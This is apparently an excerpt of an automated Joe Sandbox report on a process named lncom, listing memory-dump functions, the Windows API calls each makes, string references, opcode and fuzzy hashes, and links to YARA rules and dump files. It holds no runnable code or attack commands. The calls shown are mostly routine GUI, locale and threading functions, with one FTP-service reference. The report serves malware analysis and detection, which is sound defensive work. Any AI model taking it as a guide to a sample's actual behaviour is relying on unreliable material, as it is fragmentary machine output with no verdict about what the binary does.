OffsetRect.USER32(?,000000FF,000000FF), ref: 00454F59
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00454FC0

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: cc976a92f1b21628f5695aa5ccf81e2b7c4abc397364967f5283eb25facc9486
Instruction ID: 94ca96556a57be396ce62e498d6a51273b45f15f0a4f0663f48e8c99283401d3
Opcode Fuzzy Hash: cc976a92f1b21628f5695aa5ccf81e2b7c4abc397364967f5283eb25facc9486
Instruction Fuzzy Hash: B0519371A00204AFDB11EFA9C882B9EB7E5EB45319F14855AFD149B393C73CDE488B58

Uniqueness

Uniqueness Score: -1.00%

Function 004734FC Relevance: 7.6, APIs: 5, Instructions: 139threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00473900: WindowFromPoint.USER32(-000000F4,?,-0000000C,00473516,?,?,-0000000C), ref: 00473906
Part of subcall function 00473900: GetParent.USER32(00000000), ref: 0047391D

GetWindow.USER32(00000000,00000004), ref: 0047351E
GetCurrentThreadId.KERNEL32 ref: 004735F2
EnumThreadWindows.USER32(00000000,00473490,?), ref: 004735F8
GetWindowRect.USER32(00000000,?), ref: 0047360F
IntersectRect.USER32(?,?,?), ref: 0047367D

Part of subcall function 00472B28: GetPropA.USER32(00000000,00000000), ref: 00472B3A

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Window$RectThread$CurrentEnumFromIntersectParentPointPropWindows
String ID:
API String ID: 2029896846-0
Opcode ID: 3643a196def021df846211b70a1074fba0b5345446ed87d61454e67bf40191fd
Instruction ID: bcac9c503bbbb84f0c24393b6da184734e34e4c3442c024f82de7dd30017d722
Opcode Fuzzy Hash: 3643a196def021df846211b70a1074fba0b5345446ed87d61454e67bf40191fd
Instruction Fuzzy Hash: 9D517171B00205AFCB10DFA9C885BDEB7E4AF08345F108166E918EB351D738EE41DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0049CD38 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

Rt], xrefs: 0049CD42, 0049CDA0, 0049CDFB

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID:
String ID: Rt]
API String ID: 0-3471880823
Opcode ID: 81433d5afa43d79775b2ad42fa0d6cff466ce0779f432b9758fc540697e87a95
Instruction ID: 5ff64887183d954d59e986f6d44785f14144f07432fb9e2a0cd2e3228bcf8c0e
Opcode Fuzzy Hash: 81433d5afa43d79775b2ad42fa0d6cff466ce0779f432b9758fc540697e87a95
Instruction Fuzzy Hash: E231A0742052859BDF308A698CC4B773FA9EB45724F24477BE8268B2D0D6789C02D3A9

Uniqueness

Uniqueness Score: -1.00%

Function 00479690 Relevance: 7.6, APIs: 5, Instructions: 104COMMON

Download Yara Rule

APIs

BeginPaint.USER32(00000000,?), ref: 004796B6
SaveDC.GDI32(?), ref: 004796EA
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0047974C
RestoreDC.GDI32(?,?), ref: 00479776
EndPaint.USER32(00000000,?,004797B7), ref: 004797AA

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 2d0fd1ecc7dabe6734edcc66621e05e26597f128365a6a76d076275500a302e3
Instruction ID: 6e42104db38c995161713bd8ecd053693ae5357d55e8c968eee5ff09cf4eccb0
Opcode Fuzzy Hash: 2d0fd1ecc7dabe6734edcc66621e05e26597f128365a6a76d076275500a302e3
Instruction Fuzzy Hash: 92413D70A14204EFCB54DFA9C985EDAB7F9EF48304F1580AAE5089B362D7799D41CB18

Uniqueness

Uniqueness Score: -1.00%

Function 004504D8 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00450514
SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00450543
SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 0045055F
SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0045058A
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004505A8

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 983f7cee280e5b0d2b7c03c94270ce6d628c85331806bf464c607ffc7a6d479a
Instruction ID: e88e2fa02776e2be2176aa8349f7b3e12d09a11358a30e7efbe7bf9151507ff4
Opcode Fuzzy Hash: 983f7cee280e5b0d2b7c03c94270ce6d628c85331806bf464c607ffc7a6d479a
Instruction Fuzzy Hash: E32192B56407087FD710EBA6CC86F8FBBE8DB45715F50453B7A14E7282DB789E008A28

Uniqueness

Uniqueness Score: -1.00%

Function 0046E208 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0046E22B
SendMessageA.USER32(00000000,-0000BBEE,00000000,?), ref: 0046E27F
GetWindowLongA.USER32(00000000,000000FA), ref: 0046E28F
SendMessageA.USER32(00000000,-0000BBEE,00000000,?), ref: 0046E2AE

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: MessageSend$CaptureLongWindow
String ID:
API String ID: 1158686931-0
Opcode ID: 28b2d46d5e82a28cc38c9c5d47c23a61634d5363eb7c9c6c3d04669ef450606d
Instruction ID: 8b2ad1a3ba6fb5521d0b4fd424a671371650cac4c7005aaafc1ad7ae76a8efd3
Opcode Fuzzy Hash: 28b2d46d5e82a28cc38c9c5d47c23a61634d5363eb7c9c6c3d04669ef450606d
Instruction Fuzzy Hash: 911190792042099FD660FA9F8D90F9373CE9B25314B10456BFA59C3382FA58EC10876A

Uniqueness

Uniqueness Score: -1.00%

Function 00460DA8 Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00460DFE
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00460E13
GetDeviceCaps.GDI32(00000000,0000000E), ref: 00460E1D
CreateHalftonePalette.GDI32(00000000,00000000,?,00000000,?,?,00460CCA,?,?,00460C32,?,?,005D9C24,?,004B63EB), ref: 00460E41
ReleaseDC.USER32(00000000,00000000), ref: 00460E4C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CapsDevice$CreateHalftonePaletteRelease
String ID:
API String ID: 2404249990-0
Opcode ID: 7bb7146f1a01b8a9ad92705d199de602813b55a9f53525ae54c83d5b9270ed6d
Instruction ID: f359a65b6c1de4ced0c56de7db570f5cc8c08c2d528fd500c6d5c355444efc23
Opcode Fuzzy Hash: 7bb7146f1a01b8a9ad92705d199de602813b55a9f53525ae54c83d5b9270ed6d
Instruction Fuzzy Hash: FE11D631A0136ADEDB31EF26C4417EF3A94AF51755F04092BFC0496281E7B9CC84C3AA

Uniqueness

Uniqueness Score: -1.00%

Function 0045D3B4 Relevance: 7.6, APIs: 5, Instructions: 55windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0045D3CC
GetDeviceCaps.GDI32(?,00000068), ref: 0045D3E8
GetPaletteEntries.GDI32(650807DA,00000000,00000008,?), ref: 0045D400
GetPaletteEntries.GDI32(650807DA,00000008,00000008,?), ref: 0045D418
ReleaseDC.USER32(00000000,?), ref: 0045D434

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: EntriesPalette$CapsDeviceRelease
String ID:
API String ID: 3128150645-0
Opcode ID: 3e9f54504160edb528cac317aab7c913ce9ba51df5bb5e29f91579ceb07fe4f2
Instruction ID: f213f30fa5db110ce6afb7a9c0471f9004ff0b17d6817971a149181ee00d4324
Opcode Fuzzy Hash: 3e9f54504160edb528cac317aab7c913ce9ba51df5bb5e29f91579ceb07fe4f2
Instruction Fuzzy Hash: 88110831548304BEFB10CBA5CC42FAD77ACE74A714F40809BF604DA1C1DAB96448C329

Uniqueness

Uniqueness Score: -1.00%

Function 00487554 Relevance: 7.5, APIs: 5, Instructions: 36threadsynchronizationwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0048755E
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0048757C
MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,00000040), ref: 0048758E
WaitForSingleObject.KERNEL32(?,000000FF), ref: 004875A1
GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 004875AC

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
String ID:
API String ID: 1797888035-0
Opcode ID: 20c89e03bd9b9aacbcfa14ff220cf507d9c8d90d4379ff77dc8ffb6543879f98
Instruction ID: 5325c3335ac8d887dbb73cd99b700a82f7da9e40768a7276d5b1e59e41f20f26
Opcode Fuzzy Hash: 20c89e03bd9b9aacbcfa14ff220cf507d9c8d90d4379ff77dc8ffb6543879f98
Instruction Fuzzy Hash: 71F06270A483017BD610EA54CC86F8E7398AB45710F204E0BB254DB2D1DA7CE841876F

Uniqueness

Uniqueness Score: -1.00%

Function 0046D038 Relevance: 7.5, APIs: 5, Instructions: 25synchronizationthreadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 0046D047
SetEvent.KERNEL32(00000000,0046F0AA,00000000,0046E2E8,?,?,00000000,00000001,0046E3A7,?,?,?,00000000), ref: 0046D062
GetCurrentThreadId.KERNEL32 ref: 0046D067
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0046F0AA,00000000,0046E2E8,?,?,00000000,00000001,0046E3A7,?,?,?,00000000), ref: 0046D07C
CloseHandle.KERNEL32(00000000,00000000,0046F0AA,00000000,0046E2E8,?,?,00000000,00000001,0046E3A7,?,?,?,00000000), ref: 0046D087

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
String ID:
API String ID: 2429646606-0
Opcode ID: 10f345d13887861d960754e84a0fa4dcf3f4538db5d3c4323b4c85bac96ae7c6
Instruction ID: 3fe803afe542311d8e9ec102b6d5b066741b5f61f3773aff381ac0da9e5edb84
Opcode Fuzzy Hash: 10f345d13887861d960754e84a0fa4dcf3f4538db5d3c4323b4c85bac96ae7c6
Instruction Fuzzy Hash: 2CF0ACB1E071009ADB60EB79EC95A5737A8A758349F06051FB110C71A2DB3C9449EB2B

Uniqueness

Uniqueness Score: -1.00%

Function 0047F520 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 0047F760
SetCursor.USER32(00000000,?,00000000,0047F8F1), ref: 0047F7F2

Strings

XOF, xrefs: 0047F726

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Cursor
String ID: XOF
API String ID: 3268636600-1974473077
Opcode ID: 2eaca6f7894e52dace1280439b1f85ba0bdacffc960d366a9a87ce45fa4bd486
Instruction ID: 70e4f7309c8110701f3d6a71ad687346ef4a852461fe2a1ee55e05342987784f
Opcode Fuzzy Hash: 2eaca6f7894e52dace1280439b1f85ba0bdacffc960d366a9a87ce45fa4bd486
Instruction Fuzzy Hash: 97B16D30A00209DFCB10EF69C9859DEB7B1BF08304F15C566E819AB355D778EE49CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0043D1D4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144COMMON

Download Yara Rule

APIs

@Ftpsrvc@PatchIE5$qqrr17System@AnsiString.LNCOM(00000000,0043D3AC,?,00000000,00000003,00000000,00000000,?,?,0043C88F), ref: 0043D221
@Ftpsrvc@IsUNC$qqr17System@AnsiString.LNCOM(00000000,0043D3AC,?,00000000,00000003,00000000,00000000,?,?,0043C88F), ref: 0043D229
@Ftpsrvc@IsUNC$qqr17System@AnsiString.LNCOM(00000000,0043D3AC,?,00000000,00000003,00000000,00000000,?,?,0043C88F), ref: 0043D245

Strings

No current dir for ', xrefs: 0043D34D

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: AnsiFtpsrvc@StringSystem@$C$qqr17$E5$qqrr17Patch
String ID: No current dir for '
API String ID: 1406909265-96381399
Opcode ID: 07ed70b1f503d46bc5f019e2949a0bcb7cd05b195bf2f03a8f11061875eaddc6
Instruction ID: a6e64d58fb36999c2b414e933eac4bc0d4ff3ac030f49022bd1013a41853ce75
Opcode Fuzzy Hash: 07ed70b1f503d46bc5f019e2949a0bcb7cd05b195bf2f03a8f11061875eaddc6
Instruction Fuzzy Hash: DF51F974E00109AFDF00EF95D982AAEBBB5EF49305F5050BAE800A7352C778AF458B59

Uniqueness

Uniqueness Score: -1.00%

Function 0048E030 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 143threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(?,00000000,0048E1F2,?,?,?,00000000,00000000,00000000,00000000,00000000,?,0048F371,?,0046D8B3,00000000), ref: 0048E05E

Part of subcall function 0048DCF8: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,00000044,?,?,0048DD8D,?,005DABC4,005DAB94,00000001,005D541C,?,0048DDF3,?), ref: 0048DD16

Strings

yyyy, xrefs: 0048E149
eeee, xrefs: 0048E162
ggg, xrefs: 0048E13C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 9e8e5c1d9464490f6572a2a8217dc79cef5ad0cf0b1f63f8791b0c845b2610e7
Instruction ID: 1bddc4ddcae4f332f4288c5d1a9d17aec7dd1c33eac8bd87715e042aaa5e00f8
Opcode Fuzzy Hash: 9e8e5c1d9464490f6572a2a8217dc79cef5ad0cf0b1f63f8791b0c845b2610e7
Instruction Fuzzy Hash: DA41F5743042454BDB15BABB8C867BFEA99DB42308B544C3BE851C3746DBBCAD06931E

Uniqueness

Uniqueness Score: -1.00%

Function 0049EFA4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(?,00000000), ref: 0049EFB4
GetACP.KERNEL32(?,00000000), ref: 0049EFC2
GetCPInfo.KERNEL32(0049B5A1,?,?,00000000), ref: 0049EFE0

Strings

Error: system code page access failure; MBCS table not initialized, xrefs: 0049EFE9

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005BF000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005E4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000005FA000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360408721.00000000005FD000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_lncom.jbxd

Similarity

API ID: Info
String ID: Error: system code page access failure; MBCS table not initialized
API String ID: 1807457897-362886185
Opcode ID: 3abec33619c6b5a656dbf4546a09d4a9cbe1be7c10247429843a2e22691bb3fe
Instruction ID: ead801d1b430a03d6e3b807305347d19fb84872cf3f727a2a6590fe7d0e6d1be
Opcode Fuzzy Hash: 3abec33619c6b5a656dbf4546a09d4a9cbe1be7c10247429843a2e22691bb3fe
Instruction Fuzzy Hash: 2B316B219090514FDF21DA3988402BA7FCDD742328F2845BBC8E5CB3C7E3698C4A939B

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC74 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

FindWindowA.USER32(00000000,00000000), ref: 0040ECA2
GetWindow.USER32(?,00000002), ref: 0040ECB4
GetWindowTextA.USER32(?,?,000001F4), ref: 0040ECD5

Strings

,, xrefs: 0040ED0C

Memory Dump Source

Source File: 00000004.00000002.360154088.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.360143217.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004C1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000004.00000002.360154088.00000000004CA000.00000040.00000001.01000000.0000000A.sdmpDownload File
